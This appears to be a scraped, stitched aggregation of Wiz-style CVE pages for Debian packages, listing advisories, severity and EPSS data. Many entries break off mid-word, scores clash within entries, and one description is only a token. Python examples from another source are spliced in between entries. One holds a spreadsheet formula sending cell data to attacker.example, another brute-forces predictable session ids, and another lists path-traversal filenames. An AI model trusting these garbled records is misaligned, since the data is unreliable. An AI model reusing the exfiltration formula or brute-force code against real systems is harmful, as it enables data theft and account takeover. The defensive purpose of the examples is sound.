Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Vector. This vulnerability is associated with program files resources/skins.Vector.Js/stickyHeader.Js.
This issue affects Vector: from * before 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 05, 2025
## CVE-2025-59023 [HIGH, CVSS 8.2] :
Linux Debian vulnerability analysis and mitigation
Crafted delegations or IP fragments can poison cached delegations in Recursor.
Source : NVD
Score 8.2
Published February 9, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.22, edge Severity HIGH Has Fix Added at: Oct 23, 2025
Alpine 3.23 Severity HIGH Has Fix Added at: Dec 04, 2025
Debian 11, 12 Severity HIGH No Fix Added at: Oct 23, 2025
Debian 13, 14 Severity HIGH Has Fix Added at: Oct 23, 2025
Echo Severity HIGH Ha
## CVE-2026-2100 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
A flaw was found in p11-kit. A remote attacker could exploit this vulnerability by calling the C_DeriveKey function on a remote token with specific IBM kyber or IBM btc derive mechanism parameters set to NULL. This could lead to the RPC-client attempting to return an uninitialized value, potentially resulting in a NULL dereference or undefined behavior. This issue may cause an application level denial of service or other unpredictable system states.
Source : NVD
Score 5.3
Published March 26, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
## CVE-2026-4426 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
pz_log2_bs
Source : NVD
Score 6.5
Published March 19, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bsdtar
libarchive-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 20, 2026
Echo Severity MEDIUM No Fix Added at: Mar 20, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 20, 2026
Red Hat 8 Severity MEDIUM Has Fix Added at: Mar 21, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix
## CVE-2026-23474 [MEDIUM, CVSS 6.9] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mtd: Avoid boot crash in RedBoot partition table parser
Given CONFIG_FORTIFY_SOURCE=y and a recent compiler,
commit 439a1bcac648 ("fortify: Use __builtin_dynamic_object_size() when
available") produces the warning below and an oops.
Searching for RedBoot partition table in 50000000.flash at offset 0x7e0000
------------[ cut here ]------------
WARNING: lib/string_helpers.c:1035 at 0xc029e04c, CPU#0: swapper/0/1
memcmp: detected buffer overflow: 15 byte read of buffer size 14
Modules linked in:
CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.19.0 #1 NONE
As Kees said, "'names' is pointing to the final 'namelen' many bytes
of the allocation ... 'n
## CVE-2026-23115 [MEDIUM, CVSS 4.7] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
serial: Fix not set tty->port race condition
Revert commit bfc467db60b7 ("serial: remove redundant
tty_port_link_device()") because the tty_port_link_device() is not
redundant: the tty->port has to be configured before we call
uart_configure_port(), otherwise user-space can open console without TTY
linked to the driver.
This tty_port_link_device() was added explicitly to avoid this exact
issue in commit fb2b90014d78 ("tty: link tty and port before configuring
it as console"), so offending commit basically reverted the fix saying
it is redundant without addressing the actual race condition presented
there.
Reproducible always as tty->port warning on
## CVE-2026-23459 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ip_tunnel: adapt iptunnel_xmit_stats() to NETDEV_PCPU_STAT_DSTATS
Blamed commits forgot that vxlan/geneve use udp_tunnel[6]_xmit_skb() which
call iptunnel_xmit_stats().
iptunnel_xmit_stats() was assuming tunnels were only using
NETDEV_PCPU_STAT_TSTATS.
@syncp offset in pcpu_sw_netstats and pcpu_dstats is different.
32bit kernels would either have corruptions or freezes if the syncp
sequence was overwritten.
This patch also moves pcpu_stat_type closer to dev->{t,d}stats to avoid
a potential cache line miss since iptunnel_xmit_stats() needs to read it.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linu
## CVE-2025-67478 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation CheckUser. This vulnerability is associated with program files includes/Mail/UserMailer.Php.
This issue affects CheckUser: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
Echo Has Fix Added at: Dec 12, 2025
## CVE-2022-50798 [MEDIUM, CVSS 5.5] :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This candidate is a duplicate of CVE-2017-11359.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sox
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH Has Fix Added at: Dec 31, 2025
Echo Severity HIGH Has Fix Added at: Dec 31, 2025
## Related Linux Debian vulnerabilities:
## CVE-2023-53854 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ASoC: mediatek: mt8186: Fix use-after-free in driver remove path
When devm runs function in the "remove" path for a device it runs them
in the reverse order. That means that if you have parts of your driver
that aren't using devm or are using "roll your own" devm w/
devm_add_action_or_reset() you need to keep that in mind.
The mt8186 audio driver didn't quite get this right. Specifically, in
mt8186_init_clock() it called mt8186_audsys_clk_register() and then
went on to call a bunch of other devm function. The caller of
mt8186_init_clock() used devm_add_action_or_reset() to call
mt8186_deinit_clock() but, because of the intervening devm functions,
t
## CVE-2026-23079 [MEDIUM, CVSS 5.5] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
gpio: cdev: Fix resource leaks on errors in lineinfo_changed_notify()
On error handling paths, lineinfo_changed_notify() doesn't free the
allocated resources, which results in leaks. Fix it.
Source : NVD
Score 5.5
Published February 4, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-6.17
linux-aws-fips
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Feb 04, 2026
Ubuntu
## CVE-2026-35091 [HIGH, CVSS 8.2] :
Linux Debian vulnerability analysis and mitigation
A flaw was found in Corosync. A remote unauthenticated attacker can exploit a wrong return value vulnerability in the Corosync membership commit token sanity check by sending a specially crafted User Datagram Protocol (UDP) packet. This can lead to an out-of-bounds read, causing a denial of service (DoS) and potentially disclosing limited memory contents. This vulnerability affects Corosync when running in totemudp/totemudpu mode, which is the default configuration.
Source : NVD
Score 8.2
Published April 1, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Proba
## CVE-2025-68225 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
lib/test_kho: check if KHO is enabled
We must check whether KHO is enabled prior to issuing KHO commands,
otherwise KHO internal data structures are not initialized.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-6.17
linux-gcp
Sources
NVD
Debian 14 Has Fix Added at: Dec 17, 2025
Ubuntu 24.04, 25.10 Severity MEDIUM Has Fix Added at: Dec 18, 2025
## CVE-2026-0964 [MEDIUM, CVSS 5.9] :
Linux Debian vulnerability analysis and mitigation
A malicious SCP server can send unexpected paths that could make the client application overwrite local files outside of the working directory. This could be misused to create malicious executable or configuration files and make the user execute them under specific circumstances. This is the same issue as in OpenSSH, tracked as CVE-2019-6111.
Source : NVD
Score 5.0
Published March 26, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libssh4
libssh4-32bit
Sources
N
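The check an SCP client needs against a malicious server, as an added example that is not libssh's code: each `C`/`D` record the server sends is parsed, and its name is rejected unless it is a single path component that stays inside the working directory and, for a single-file transfer, matches the name the client asked for. The record regex, `plan_receive()`, `rejects()` and the sample server streams are assumptions constructed for the example.

```python
import os
import re

# Constructed example, not libssh's code. In the scp "sink" protocol the server
# announces each file as "C<mode> <size> <name>" and each directory as
# "D<mode> <size> <name>" (the E and T records are omitted here).
_RECORD = re.compile(r"^([CD])([0-7]{4}) (\d+) (.+)$")


def parse_scp_record(line: str):
    m = _RECORD.match(line.rstrip("\r\n"))
    if m is None:
        raise ValueError(f"malformed scp record: {line!r}")
    kind, mode, size, name = m.groups()
    return kind, int(mode, 8), int(size), name


def is_single_component(name: str) -> bool:
    """A server-supplied name may only ever be one path component."""
    if not name or name in (".", ".."):
        return False
    return not any(ch in name for ch in ("/", "\\", "\x00"))


def safe_local_path(workdir: str, name: str) -> str:
    """Join the name under workdir and verify the result did not escape it."""
    if not is_single_component(name):
        raise ValueError(f"refusing server-supplied name {name!r}")
    root = os.path.realpath(workdir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(target) != root:  # a symlink or normalisation escaped the directory
        raise ValueError(f"{name!r} resolves outside {root}")
    return target


def plan_receive(stream: str, workdir: str, expected=None):
    """Validate every record before anything is written to disk. When the client
    asked for one file (`expected`), the server may only deliver that name."""
    accepted = []
    for line in stream.splitlines():
        kind, _mode, _size, name = parse_scp_record(line)
        if expected is not None and name != expected:
            raise ValueError(f"server sent {name!r}, client requested {expected!r}")
        accepted.append((kind, safe_local_path(workdir, name)))
    return accepted


def rejects(stream: str, workdir: str, expected=None) -> bool:
    """True when plan_receive refuses the stream (helper for the checks)."""
    try:
        plan_receive(stream, workdir, expected)
    except ValueError:
        return True
    return False


# Constructed server streams: one benign, three that try to escape, one that
# is a valid name but not the file the client requested.
BENIGN = "C0644 12 notes.txt\n"
HOSTILE = ("C0644 5 ../.bashrc\n", "C0644 5 ..\n", "D0755 0 sub/dir\n", "C0644 5 .bashrc\n")
```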
## CVE-2026-4980 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
A local file disclosure vulnerability in the XInclude processing component of Inkscape 1.1 before 1.3 allows a remote attacker to read local files via a crafted SVG file containing malicious xi:include tags.
Source : NVD
Score 6.3
Published March 27, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
inkscape
inkscape1
Sources
NVD
Debian 12 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Sev
## CVE-2025-68338 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: dsa: microchip: Don't free uninitialized ksz_irq
If something goes wrong at setup, ksz_irq_free() can be called on
uninitialized ksz_irq (for example when ksz_ptp_irq_setup() fails). It
leads to freeing uninitialized IRQ numbers and/or domains.
Use dsa_switch_for_each_user_port_continue_reverse() in the error path
to iterate only over the fully initialized ports.
Source : NVD
Score 5.5
Published December 23, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
## CVE-2026-2625 [MEDIUM, CVSS 4.0] :
Linux Debian vulnerability analysis and mitigation
A flaw was found in rust-rpm-sequoia. An attacker can exploit this vulnerability by providing a specially crafted Red Hat Package Manager (RPM) file. During the RPM signature verification process, this crafted file can trigger an error in the OpenPGP signature parsing code, leading to an unconditional termination of the rpm process. This issue results in an application level denial of service, making the system unable to process RPM files for signature verification.
Source : NVD
Score 4.0
Published April 3, 2026
Severity MEDIUM
CNA Score 4.0
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabi
## CVE-2026-23267 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix IS_CHECKPOINTED flag inconsistency issue caused by concurrent atomic commit and checkpoint writes
During SPO tests, when mounting F2FS, an -EINVAL error was returned from
f2fs_recover_inode_page. The issue occurred under the following scenario
Thread A Thread B
f2fs_ioc_commit_atomic_write
f2fs_do_sync_file // atomic = true
block_operations// writeback last_folio
f2fs_flush_nat_entries
: {struct nat_entry}->flag |= BIT(IS_CHECKPOINTED)
unblock_operations : f2fs_up_write(&sbi->node_write)
f2fs_write_checkpoint//return
: f2fs_do_write_node_page()
f2fs_ioc_commit_atomic_write//return
SPO
Thread A calls f2fs_need_dentry_mark(sbi, ino), an
## CVE-2022-50942 [MEDIUM, CVSS 4.8] :
Echo vulnerability analysis and mitigation
Icinga Web 2.8.2 contains a client-side cross-site scripting vulnerability that allows remote attackers to inject malicious script code through the icinga.min.js file. Attackers can exploit the EventListener.handleEvent method to execute arbitrary scripts, potentially leading to session hijacking and non-persistent phishing attacks.
Source : NVD
Score 4.8
Published February 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
icingaweb2
Sources
NVD
Echo Severity MEDIUM No Fix Added
## CVE-2025-61873 [LOW, CVSS 2.6] :
Linux Debian vulnerability analysis and mitigation
Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used.
Source : NVD
Score 2.6
Published January 16, 2026
Severity LOW
CNA Score 2.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
request-tracker4
request-tracker5
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW Has Fix Added at: Oct 23, 2025
Echo Severity LOW Has Fix Added at: Nov 18, 2025
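One way to neutralize the injected cell values the advisory describes, as an added example that is not RT's code: a TSV exporter that strips tab and newline characters from every cell and prefixes a single quote to any value a spreadsheet would otherwise evaluate as a formula. The trigger list, `export_tsv()`, `demo()` and the constructed ticket rows are assumptions for the example.

```python
# Constructed example, not Request Tracker's code.
# Characters that make a spreadsheet interpret a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def neutralize_cell(value) -> str:
    """Return a version of `value` that is inert in a spreadsheet and cannot
    break the row/column structure of a TSV file.

    Tabs and line breaks are replaced so one cell cannot spill into the next
    row or column. Leading whitespace is dropped before the formula check,
    since spreadsheets ignore it, and a cell starting with a trigger gets a
    leading single quote so the application treats it as text."""
    text = "" if value is None else str(value)
    for ch in ("\t", "\n", "\r"):
        text = text.replace(ch, " ")
    stripped = text.lstrip()
    if stripped.startswith(FORMULA_TRIGGERS):
        return "'" + stripped
    return text


def export_tsv(header, rows) -> str:
    """Serialise rows as TSV, neutralizing every cell including the header."""
    lines = ["\t".join(neutralize_cell(h) for h in header)]
    for row in rows:
        lines.append("\t".join(neutralize_cell(c) for c in row))
    return "\n".join(lines) + "\n"


# Constructed ticket rows: one hostile subject, one negative-looking value,
# one with embedded tab and newline.
CONSTRUCTED_TICKETS = [
    (101, "Printer jam", "alice"),
    (102, '=HYPERLINK("http://attacker.example/"&A1,"click")', "mallory"),
    (103, "-1 day until deadline", "bob"),
    (104, "first line\tsecond\ncolumn", "carol"),
]


def demo() -> str:
    return export_tsv(("id", "subject", "requestor"), CONSTRUCTED_TICKETS)
```

The quote prefix also neutralizes legitimate values such as `-1 day until deadline`; that is the usual trade-off, and a stricter exporter could apply it only to non-numeric cells. The prefix protects against formula evaluation, not against every spreadsheet feature, so data exported from untrusted ticket fields should still be treated as untrusted.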
## CVE-2025-62600 [HIGH, CVSS 8.6] :
Linux Debian vulnerability analysis and mitigation
Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 3.4.1, 3.3.1, and 2.6.11, when the security mode is enabled, modifying the DATA Submessage within an SPDP packet sent by a publisher causes an Out-Of-Memory (OOM) condition, resulting in remote termination of Fast-DDS. If the fields of PID_IDENTITY_TOKEN or PID_PERMISSION_TOKEN in the DATA Submessage are modified, specifically by tampering with the length field in readBinaryPropertySeq, an integer overflow occurs, leading to an OOM during the resize operation. Versions 3.4.1, 3.3.1, and 2.6.11 patch the issue.
Source : NVD
Score 1.7
Published February 3, 2026
Severity
## CVE-2016-20038 [HIGH, CVSS 8.6] :
Echo vulnerability analysis and mitigation
yTree 1.94-1.1 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an excessively long argument to the application. Attackers can craft a malicious command-line argument containing shellcode and a return address to overwrite the stack and execute code in the application context.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ytree
Sources
NVD
Echo Severity HIGH No Fix Added
## CVE-2025-68793 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix a job->pasid access race in gpu recovery
Avoid a possible UAF in GPU recovery due to a race between
the sched timeout callback and the tdr work queue.
The gpu recovery function calls drm_sched_stop() and
later drm_sched_start(). drm_sched_start() restarts
the tdr queue which will eventually free the job. If
the tdr queue frees the job before time out callback
completes, the job will be freed and we'll get a UAF
when accessing the pasid. Cache it early to avoid the
UAF.
Example KASAN trace:
[ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.067530] Read of size 4 at addr ffff88b0ce3
Wiz
CVE-2023-54068 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54068 CVE-2023-54068 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54068 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: compress: fix to call f2fs_wait_on_page_writeback() in f2fs_write_raw_pages()
BUG_ON() will be triggered when writing files concurrently,
because the same page is writtenback multiple times.
1597 void folio_end_writeback(struct folio *folio)
1598 {
......
1618 if (!__folio_end_writeback(folio))
1619 BUG();
......
1625 }
kernel BUG at mm/filemap.c:1619!
Call Trace: f2fs_write_end_io+0x1a0/0x370
blk_update_request+0x6c/0x410
blk_mq_end_request+0x15/0x130
blk_complete_reqs+0x3c/0x50
__do_softirq+0xb8/0x29b
? sort_range+0x20/0x20
run_ksoftirqd+0x19/0x20
smpboot_thread_fn+0x10b/0x1d0
kthread+0xde/0x110
? kthread_complete_and_exit+0x20/0x20
ret_fr
## CVE-2025-55816 [MEDIUM, CVSS 6.1] :
Linux Debian vulnerability analysis and mitigation
HotelDruid v3.0.7 and before is vulnerable to Cross Site Scripting (XSS) in the /modifica_app.php file.
Source : NVD
Score 6.1
Published December 11, 2025
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
hoteldruid
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Dec 12, 2025
Echo Severity MEDIUM No Fix Added at: Dec 12, 2025
## CVE-2025-40932 [HIGH, CVSS 8.2] :
Linux Debian vulnerability analysis and mitigation
Apache::SessionX versions through 2.01 for Perl create insecure session id.
Apache::SessionX generates session ids insecurely. The default session id generator in Apache::SessionX::Generate::MD5 returns an MD5 hash seeded with the built-in rand() function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage. Predictable session ids could allow an attacker to gain access to systems.
Source : NVD
Score 8.2
Published February 27, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Ex
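To make the predictability concrete, an added example (not Apache::SessionX's code) models the weak generator as an MD5 over a PRNG output, the epoch time and the PID, and shows an attacker recovering the inputs by brute force over a small time window and PID set; a generator built on the operating system CSPRNG sits beside it. The seeding rule `epoch ^ pid`, the PID range and the victim values are assumptions constructed so the model runs deterministically; they are not claims about how Perl seeds `rand()`.

```python
import hashlib
import random
import secrets

# Constructed model of the weak scheme: hex MD5 over a PRNG output, the epoch
# time and the PID. Seeding the PRNG with epoch ^ pid is an assumption made so
# the model is reproducible; it says nothing about Perl's real seeding.


def weak_session_id(epoch: int, pid: int) -> str:
    rnd = random.Random(epoch ^ pid).random()
    return hashlib.md5(f"{rnd}{epoch}{pid}".encode()).hexdigest()


def strong_session_id() -> str:
    """128 bits straight from the OS CSPRNG; no input an attacker can guess."""
    return secrets.token_hex(16)


def recover_weak_session(target: str, epoch_guess: int, window: int, pid_candidates):
    """Attacker view: the Date header leaks the time to within `window` seconds
    and the PID comes from a small candidate set, so the id space is only
    (2 * window + 1) * len(pid_candidates) values."""
    for epoch in range(epoch_guess - window, epoch_guess + window + 1):
        for pid in pid_candidates:
            if weak_session_id(epoch, pid) == target:
                return epoch, pid
    return None


def demo():
    """Recover a constructed victim's (epoch, pid) from its weak id, then show the
    same search finds nothing for a CSPRNG-generated id."""
    epoch, pid = 1_700_000_000, 4321      # constructed victim values
    pids = range(4096, 4608)              # 512 candidate PIDs, as the advisory's "small set"
    found = recover_weak_session(weak_session_id(epoch, pid), epoch + 7, 30, pids)
    missed = recover_weak_session(strong_session_id(), epoch + 7, 30, pids)
    return found, missed
```

The search in `demo()` covers 61 × 512 candidates, which is trivial; the point is that hashing guessable inputs does not add entropy, whereas the strong generator leaves nothing to enumerate.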
## CVE-2026-23092 [HIGH, CVSS 7.8] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
iio: dac: ad3552r-hs: fix out-of-bound write in ad3552r_hs_write_data_source
When simple_write_to_buffer() succeeds, it returns the number of bytes
actually copied to the buffer. The code incorrectly uses 'count'
as the index for null termination instead of the actual bytes copied.
If count exceeds the buffer size, this leads to out-of-bounds write.
Add a check for the count and use the return value as the index.
The bug was validated using a demo module that mirrors the original
code and was tested under QEMU.
Pattern of the bug:
A fixed 64-byte stack buffer is filled using count.
If count > 64, the code still does buf[count] = '\0', causing an
## CVE-2026-23134 [MEDIUM, CVSS 5.5] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
slab: fix kmalloc_nolock() context check for PREEMPT_RT
On PREEMPT_RT kernels, local_lock becomes a sleeping lock. The current
check in kmalloc_nolock() only verifies we're not in NMI or hard IRQ
context, but misses the case where preemption is disabled.
When a BPF program runs from a tracepoint with preemption disabled
(preempt_count > 0), kmalloc_nolock() proceeds to call
local_lock_irqsave() which attempts to acquire a sleeping lock,
triggering:
BUG: sleeping function called from invalid context
in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 6128
preempt_count: 2, expected: 0
Fix this by checking !preemptible() on PREEMPT_RT, which dir
## CVE-2026-27853 [MEDIUM, CVSS 5.9] :
Linux Debian vulnerability analysis and mitigation
An attacker might be able to trigger an out-of-bounds write by sending crafted DNS responses to a DNSdist using the DNSQuestion:changeName or DNSResponse:changeName methods in custom Lua code. In some cases the rewritten packet might become larger than the initial response and even exceed 65535 bytes, potentially leading to a crash resulting in denial of service.
Source : NVD
Score 5.9
Published March 31, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sou
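The bound a name-rewriting hook has to enforce, as an added example that is not DNSdist's code: the new name is encoded to wire form, the size of the rewritten message is computed before anything is written, and the rewrite is refused when it would exceed the 16-bit length limit of a DNS message or the label and name limits of RFC 1035. The example rewrites only the question name of a message with a single question, whereas DNSdist's `changeName` touches more of the packet; `build_message()`, `rewrite_is_rejected()` and the constructed messages are assumptions for the example.

```python
import struct

# Constructed example, not DNSdist's code. A DNS message over TCP carries a
# 16-bit length prefix, so nothing larger than 65535 octets can be sent.
MAX_DNS_MESSAGE = 65535


def encode_name(name: str) -> bytes:
    """Encode a dotted name as wire-format labels, enforcing RFC 1035 limits."""
    out = bytearray()
    for label in [part for part in name.rstrip(".").split(".") if part]:
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError("label length must be between 1 and 63 octets")
        out.append(len(raw))
        out += raw
    out.append(0)  # root label terminates the name
    if len(out) > 255:
        raise ValueError("name exceeds 255 octets on the wire")
    return bytes(out)


def uncompressed_name_length(msg: bytes, offset: int) -> int:
    """Wire length of the name at `offset`; question names are never compressed."""
    pos = offset
    while True:
        if pos >= len(msg):
            raise ValueError("truncated name")
        n = msg[pos]
        if n == 0:
            return pos + 1 - offset
        if n & 0xC0:
            raise ValueError("invalid label length or compression pointer in question")
        pos += 1 + n


def build_message(qname: str, qtype: int = 1, payload: bytes = b"") -> bytes:
    """Header with one question (flags mark it as a response) plus an opaque tail
    standing in for the answer sections."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1) + payload


def rewrite_question_name(msg: bytes, new_name: str, limit: int = MAX_DNS_MESSAGE) -> bytes:
    """Replace the question name, refusing rewrites that would oversize the message."""
    if len(msg) < 12 or struct.unpack("!H", msg[4:6])[0] != 1:
        raise ValueError("expected a message with exactly one question")
    old_len = uncompressed_name_length(msg, 12)
    new_wire = encode_name(new_name)
    new_size = len(msg) - old_len + len(new_wire)
    if new_size > limit:
        raise ValueError(f"rewritten message would be {new_size} octets, limit is {limit}")
    return msg[:12] + new_wire + msg[12 + old_len:]


def rewrite_is_rejected(msg: bytes, new_name: str, limit: int = MAX_DNS_MESSAGE) -> bool:
    """True when the rewrite is refused (helper for the checks)."""
    try:
        rewrite_question_name(msg, new_name, limit)
    except ValueError:
        return True
    return False
```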
## CVE-2026-4775 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
A flaw was found in the libtiff library. A remote attacker could exploit a signed integer overflow vulnerability in the putcontig8bitYCbCr44tile function by providing a specially crafted TIFF file. This flaw can lead to an out-of-bounds heap write due to incorrect memory pointer calculations, potentially causing a denial of service (application crash) or arbitrary code execution.
Source : NVD
Score 7.8
Published March 24, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.9
Exploitation Probability (EPSS) 0.1
Affected packages and
CVE-2026-23404 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23404 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: replace recursive profile removal with iterative approach
The profile removal code uses recursion when removing nested profiles,
which can lead to kernel stack exhaustion and system crashes.
Reproducer:
$ pf='a'; for ((i=0; i /sys/kernel/security/apparmor/.remove
